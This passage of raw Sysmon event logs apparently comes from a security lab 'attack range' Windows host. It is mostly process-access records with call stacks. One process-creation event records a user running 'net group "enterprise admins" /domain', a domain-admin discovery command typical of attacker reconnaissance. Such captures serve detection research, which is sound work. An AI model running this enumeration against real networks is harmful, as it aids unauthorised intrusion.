Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E43C4E5FEB6A2692FE9619F71C751903,SHA256=AE7749EBCE2931CCCC036D4633878089B0794F9B03906D9D46C73FD63447B09E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.836{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D247019A5E9489FEBDE9FCF2CFA25DDF,SHA256=00E4CC0ABB57458EFB5E22E50D4FB91D325C49E22AE63EED4E65F7AA129651FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.762{B81B27B7-8383-613A-D596-03000000C801}50164360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035128395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.748{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F5C21793591C3DD2FC43E3B17108CE0,SHA256=0D83DCF1B5E358949AB6A29D7060B64775A79D0578A5729CFE7610DA5EB847B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.544{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8383-613A-D596-03000000C801}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.544{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.544{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.544{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.544{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.544{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8383-613A-D596-03000000C801}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.544{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8383-613A-D596-03000000C801}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:27.523{B81B27B7-8383-613A-D596-03000000C801}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035128420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.473{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035128419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.473{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035128418Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.473{B81B27B7-4012-611D-0B00-00000000C801}6364628C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035128417Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.473{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035128416Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.473{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-8384-613A-D796-03000000C801}5940C:\Windows\system32\net1.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128415Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.473{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-8384-613A-D796-03000000C801}5940C:\Windows\system32\net1.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128414Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.470{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-8384-613A-D796-03000000C801}5940C:\Windows\system32\net1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128413Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.468{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128412Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.468{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.468{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.468{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-8384-613A-D796-03000000C801}5940C:\Windows\system32\net1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.468{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.467{B81B27B7-8384-613A-D696-03000000C801}66121040C:\Windows\system32\net.exe{B81B27B7-8384-613A-D796-03000000C801}5940C:\Windows\system32\net1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\net.exe+240f|C:\Windows\system32\net.exe+1883|C:\Windows\system32\net.exe+163b|C:\Windows\system32\net.exe+1375|C:\Windows\system32\net.exe+26fd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.467{B81B27B7-8384-613A-D796-03000000C801}5940C:\Windows\System32\net1.exe10.0.14393.0 (rs1_release.160715-1616)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet1.exeC:\Windows\system32\net1 group "enterprise admins" /domainC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=946383ED00F5CD92DBCB7CDB878ED819,SHA256=E92A2FA67AD2F7367ABA1ABF237D245B5E36291C5A4A9F0FC04B3A0E32FF618E,IMPHASH=E2F26A4CA577CF6DBACE937727934F80{B81B27B7-8384-613A-D696-03000000C801}6612C:\Windows\System32\net.exe"C:\Windows\system32\net.exe" group "enterprise admins" /domain 10341000x800000000000000035128406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.452{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-8384-613A-D696-03000000C801}6612C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.452{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.452{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128403Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 